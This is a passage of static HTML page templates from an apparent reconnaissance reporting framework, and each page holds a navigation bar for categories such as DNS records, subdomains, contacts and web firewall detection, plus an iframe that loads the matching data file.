39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li class="current"><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li class="current"><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Files: <small class="lg-text">PowerPoint</small></h2>
80 | 			<iframe src="../data/ppt.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/records.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li class="current"><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li class="current"><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">DNS: <small class="lg-text">Records</small></h2>
80 | 			<iframe src="../data/records.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/waf.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li class="current"><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li class="current"><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Web App FW</small></h2>
80 | 			<iframe src="../data/waf.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/whatweb.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li class="current"><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li class="current"><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Web: <small class="lg-text">Whatweb</small></h2>
80 | 			<iframe src="../data/whatweb.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/emails.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li class="current"><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li class="current"><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Contacts: <small class="lg-text">Emails</small></h2>
80 | 			<iframe src="../data/emails.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/names.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li class="current"><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li class="current"><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 
26 | 			<li><a href="#">DNS</a>
27 | 			<ul>
28 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
29 | 			     <li><a href="../pages/config.htm">Config</a></li>
30 | 			     <li><a href="../pages/records.htm">Records</a></li>
31 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
32 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
33 | 			</ul>         
34 | 			</li>
35 | 
36 | 			<li><a href="#">Domain</a>
37 | 			<ul>
38 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
39 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
40 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
41 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
42 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
43 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
44 | 			</ul>         
45 | 			</li>
46 | 
47 | 			<li><a href="#">Files</a>
48 | 			<ul>
49 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
50 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
51 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
52 | 			     <li><a href="../pages/txt.htm">Text</a></li>
53 | 			     <li><a href="../pages/doc.htm">Word</a></li>
54 | 			</ul>         
55 | 			</li>
56 | 
57 | 			<li><a href="#">Reports</a>
58 | 			<ul>
59 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
60 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
61 | 			</ul>         
62 | 			</li>
63 | 
64 | 			<li><a href="#">Web</a>
65 | 			<ul>
66 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
67 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
68 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
69 | 			</ul>         
70 | 			</li>
71 | 		</ul>
72 | 	</div>
73 | </div>
74 | 
75 | <div class="clear"></div>
76 | 
77 | <div class="wrapper">
78 | 	<div class="container_12">
79 | 		<div class="main-content">
80 | 			<h2 class="page-header">Contacts: <small class="lg-text">Names</small></h2>
81 | 			<iframe src="../data/names.htm" width="100%"></iframe>
82 | 		</div>
83 | 	</div>
84 | </div>
85 | 
86 | </body>
87 | 
88 | </html>
89 | 
90 | 


--------------------------------------------------------------------------------
/report/pages/squatting.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li class="current"><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li class="current"><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Squatting</small></h2>
80 | 			<iframe src="../data/squatting.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/subdomains.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li class="current"><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li class="current"><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">DNS: <small class="lg-text">Subdomains</small></h2>
80 | 			<iframe src="../data/subdomains.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/whois-ip.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li class="current"><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li class="current"><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Whois IP</small></h2>
80 | 			<iframe src="../data/whois-ip.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/black-listed.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li class="current"><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li class="current"><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
